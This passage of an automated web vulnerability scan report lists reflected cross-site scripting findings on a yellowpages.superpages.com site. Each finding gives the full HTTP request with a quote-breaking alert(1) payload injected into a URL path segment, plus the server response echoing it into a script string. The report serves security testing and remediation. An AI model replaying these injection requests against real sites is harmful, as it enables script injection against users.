Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common992a6&quot;-alert(1)-&quot;25f8f156e7b/css/styles.css
Server: Unspecified
Set-Cookie: JSESSIONID=3211127661936C99371FE25634686EA3; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:58 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common992a6"-alert(1)-"25f8f156e7b/css/styles.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.589. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/styles.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd028"-alert(1)-"da24c435281 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/cssdd028"-alert(1)-"da24c435281/styles.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/cssdd028&quot;-alert(1)-&quot;da24c435281/styles.css
Server: Unspecified
Set-Cookie: JSESSIONID=8987766902F63B3992E6CA214283A0CE; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:06 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/cssdd028"-alert(1)-"da24c435281/styles.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.590. http://yellowpages.superpages.com/common/css/styles.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/styles.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67e49"-alert(1)-"cece7288702 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/styles.css67e49"-alert(1)-"cece7288702 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/styles.css67e49&quot;-alert(1)-&quot;cece7288702
Server: Unspecified
Set-Cookie: JSESSIONID=3D234B69705369EA8A13C831B4DC2D38; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:15 GMT
Cache-Control: private
Content-Length: 36081


                       <!--
       
       -->


                                   
...[SNIP]...
ellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/styles.css67e49"-alert(1)-"cece7288702?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.591. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/typography.css

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd884"-alert(1)-"66558d398fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commondd884"-alert(1)-"66558d398fa/css/typography.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commondd884&quot;-alert(1)-&quot;66558d398fa/css/typography.css
Server: Unspecified
Set-Cookie: JSESSIONID=8C9E587A9A2B11245C4CB313D66A5039; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:28 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commondd884"-alert(1)-"66558d398fa/css/typography.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.592. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/typography.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cec5"-alert(1)-"d776eed8f91 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css6cec5"-alert(1)-"d776eed8f91/typography.css HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css6cec5&quot;-alert(1)-&quot;d776eed8f91/typography.css
Server: Unspecified
Set-Cookie: JSESSIONID=0FE3B1548143B2CCE3AB4A9092140C80; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:37 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css6cec5"-alert(1)-"d776eed8f91/typography.css?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.593. http://yellowpages.superpages.com/common/css/typography.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/css/typography.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c512b"-alert(1)-"208ebd640d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/css/typography.cssc512b"-alert(1)-"208ebd640d3 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/css/typography.cssc512b&quot;-alert(1)-&quot;208ebd640d3
Server: Unspecified
Set-Cookie: JSESSIONID=BE70921D9EFA0EDB349E547050E51902; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:33:45 GMT
Cache-Control: private
Content-Length: 36089


                       <!--
       
       -->


                                   
...[SNIP]...
wpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/css/typography.cssc512b"-alert(1)-"208ebd640d3?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.594. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/alertcommon.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1603f"-alert(1)-"7b40bab0d58 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common1603f"-alert(1)-"7b40bab0d58/js/alertcommon.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common1603f&quot;-alert(1)-&quot;7b40bab0d58/js/alertcommon.js
Server: Unspecified
Set-Cookie: JSESSIONID=31374E21CBB6E62331151FDD9D287B6E; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:30 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common1603f"-alert(1)-"7b40bab0d58/js/alertcommon.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.595. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/alertcommon.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20813"-alert(1)-"42f38a119fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js20813"-alert(1)-"42f38a119fb/alertcommon.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js20813&quot;-alert(1)-&quot;42f38a119fb/alertcommon.js
Server: Unspecified
Set-Cookie: JSESSIONID=1964063886F42A385D9BF560E5991661; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:37 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js20813"-alert(1)-"42f38a119fb/alertcommon.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.596. http://yellowpages.superpages.com/common/js/alertcommon.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/alertcommon.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c615e"-alert(1)-"fd5addf1395 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/alertcommon.jsc615e"-alert(1)-"fd5addf1395 HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/alertcommon.jsc615e&quot;-alert(1)-&quot;fd5addf1395
Server: Unspecified
Set-Cookie: JSESSIONID=C42F1F43179B33DCF485D91863AA0026; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:44 GMT
Cache-Control: private
Content-Length: 36087


                       <!--
       
       -->


                                   
...[SNIP]...
owpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/alertcommon.jsc615e"-alert(1)-"fd5addf1395?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.597. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/browser_check.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bae19"-alert(1)-"9957299e054 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commonbae19"-alert(1)-"9957299e054/js/browser_check.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commonbae19&quot;-alert(1)-&quot;9957299e054/js/browser_check.js
Server: Unspecified
Set-Cookie: JSESSIONID=E09C44F1BBBAA213F4E42EF428D3F357; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:27 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commonbae19"-alert(1)-"9957299e054/js/browser_check.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.598. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/browser_check.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67314"-alert(1)-"4d0383f1bcf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js67314"-alert(1)-"4d0383f1bcf/browser_check.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js67314&quot;-alert(1)-&quot;4d0383f1bcf/browser_check.js
Server: Unspecified
Set-Cookie: JSESSIONID=36F4629CEBB28C41CD456D4BA38FDE53; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:44 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js67314"-alert(1)-"4d0383f1bcf/browser_check.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.599. http://yellowpages.superpages.com/common/js/browser_check.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/browser_check.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4823"-alert(1)-"6b96276b57d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/browser_check.jsb4823"-alert(1)-"6b96276b57d HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/browser_check.jsb4823&quot;-alert(1)-&quot;6b96276b57d
Server: Unspecified
Set-Cookie: JSESSIONID=3F77784525870BE1A8C596BB0EA60651; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:51 GMT
Cache-Control: private
Content-Length: 36091


                       <!--
       
       -->


                                   
...[SNIP]...
pages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js/browser_check.jsb4823"-alert(1)-"6b96276b57d?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.600. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/iepopup.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa65f"-alert(1)-"34ef4e6041c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /commonaa65f"-alert(1)-"34ef4e6041c/js/iepopup.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /commonaa65f&quot;-alert(1)-&quot;34ef4e6041c/js/iepopup.js
Server: Unspecified
Set-Cookie: JSESSIONID=2134AC985409415C2A045A7FF6023BCE; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:31:41 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
erv = 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/commonaa65f"-alert(1)-"34ef4e6041c/js/iepopup.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.601. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/iepopup.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7547e"-alert(1)-"e77ecaba831 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js7547e"-alert(1)-"e77ecaba831/iepopup.js HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js7547e&quot;-alert(1)-&quot;e77ecaba831/iepopup.js
Server: Unspecified
Set-Cookie: JSESSIONID=BA40BC8F6A7DD188B47568ADA942F69A; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:00 GMT
Cache-Control: private
Content-Length: 36079


                       <!--
       
       -->


                                   
...[SNIP]...
= 'http://yellowpages.superpages.com';
var searchtype="two";


searchtype="one";


var actualUrl = "http://yellowpages.superpages.com/common/js7547e"-alert(1)-"e77ecaba831/iepopup.js?=";
var client_id = "133515049997773";


var redirecturl = 'http://yellowpages.superpages.com/Facebook';


//-->
...[SNIP]...

4.602. http://yellowpages.superpages.com/common/js/iepopup.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://yellowpages.superpages.com
Path:   /common/js/iepopup.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57121"-alert(1)-"a019059d18b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /common/js/iepopup.js57121"-alert(1)-"a019059d18b HTTP/1.1
Host: yellowpages.superpages.com
Proxy-Connection: keep-alive
Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SPC=1296748823650-www.superpages.com-30323935-794472

Response

HTTP/1.1 404 /common/js/iepopup.js57121&quot;-alert(1)-&quot;a019059d18b
Server: Unspecified
Set-Cookie: JSESSIONID=5FEE5F212D4C070AC3E37397025C1DA1; Path=/
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Date: Thu, 03 Feb 2011 16:32:20 GMT
Cache-Control: private
